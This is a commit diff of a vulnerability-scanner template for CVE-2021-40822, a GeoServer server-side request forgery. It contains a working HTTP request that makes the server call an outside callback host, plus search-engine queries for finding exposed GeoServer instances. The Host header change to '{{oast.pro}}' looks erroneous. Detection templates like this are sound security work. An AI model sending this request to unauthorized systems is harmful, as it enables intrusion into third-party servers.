Merge pull request #7656 from aringo-bf/main

Fixed 2021-40822
2023-07-12 17:33:34 +05:30 · 2023-07-12 17:33:34 +05:30 · 603b52e01b
parent 94098dbe2f ed22f507dd
commit 603b52e01b
1 changed files with 9 additions and 7 deletions
--- a/http/cves/2021/CVE-2021-40822.yaml
+++ b/http/cves/2021/CVE-2021-40822.yaml
@ -2,7 +2,7 @@ id: CVE-2021-40822

 info:
  name: Geoserver - Server-Side Request Forgery
-  author: For3stCo1d
+  author: For3stCo1d,aringo-bf
  severity: high
  description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
  reference:
@ -19,29 +19,31 @@ info:
    epss-score: 0.65495
  metadata:
    max-request: 1
-    fofa-query: app="GeoServer"
    verified: true
+    shodan-query: title:"GeoServer"
+    fofa-query: app="GeoServer"
  tags: cve,cve2021,ssrf,geoserver

 http:
  - raw:
      - |
        POST /geoserver/TestWfsPost HTTP/1.1
-        Host: {{Hostname}}
+        Host: {{oast.pro}}
        Content-Type: application/x-www-form-urlencoded

-        form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
+        form_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=

    matchers-condition: and
    matchers:
      - type: word
-        part: interactsh_protocol # Confirms the HTTP Interaction
+        part: body
        words:
-          - "http"
+          - "<b>Interactsh</b>"

      - type: word
+        part: header
        words:
-          - "<html><head></head><body>"
+          - "text/html"

      - type: status
        status: